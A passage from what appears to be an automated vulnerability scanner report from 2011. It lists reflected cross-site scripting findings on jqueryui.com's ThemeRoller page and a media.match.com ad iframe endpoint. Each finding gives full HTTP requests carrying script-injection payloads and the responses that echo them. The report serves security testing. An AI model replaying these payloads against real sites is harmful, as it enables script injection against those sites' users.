0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI ...[SNIP]...
4.84. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2f3"><script>alert(1)</script>b0d24937c9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?fa2f3"><script>alert(1)</script>b0d24937c9e=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:24:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ca4"><script>alert(1)</script>ef8babd57d1 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px31ca4"><script>alert(1)</script>ef8babd57d1&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2a1"><script>alert(1)</script>f8e2e66cbd8 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4a2a1"><script>alert(1)</script>f8e2e66cbd8&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b66d"><script>alert(1)</script>623c2b48503 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305b66d"><script>alert(1)</script>623c2b48503&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40eb"><script>alert(1)</script>9eed84605e5 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30b40eb"><script>alert(1)</script>9eed84605e5&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e7eb"><script>alert(1)</script>0ffcdae2d95 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px9e7eb"><script>alert(1)</script>0ffcdae2d95&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 143e5"><script>alert(1)</script>b0bf9d965be was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965be HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:37 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:37 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:37 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4987 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... ?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965behttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119127_728x90"> ...[SNIP]...
The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84aee'-alert(1)-'c49b8f1b23a was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23a HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:38 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4928 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 14_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23ahttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90'); clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/1777 ...[SNIP]...
4.92. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.match.com
Path:
/cookE/geoip/iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f6b"><script>alert(1)</script>f17304568b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1 HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:38 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4984 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90"> ...[SNIP]...
4.93. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.match.com
Path:
/cookE/geoip/iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f94'-alert(1)-'1e9875c14ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1 HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:39 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:39 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:39 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4939 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 4_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90'); clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/17 ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cbf1'%3balert(1)//38af7fabdfe was submitted in the target parameter. This input was echoed as 2cbf1';alert(1)//38af7fabdfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank2cbf1'%3balert(1)//38af7fabdfe&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:36 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4942 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 11ew_vsgeo_selectgenderzipbkgd_vpblubtn_110810_noy_728x90.swf'; var flash_name= '"' + swf_name + '"'; var swfVer= 80/10; var swfMime= 'application/x-shockwave-flash'; var clickTAGs= 'clickTARGET=_blank2cbf1';alert(1)//38af7fabdfe' + '&clickTAG=' + escape('http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&ml_multi ...[SNIP]...
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4913e"><script>alert(1)</script>2aae3020d1a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
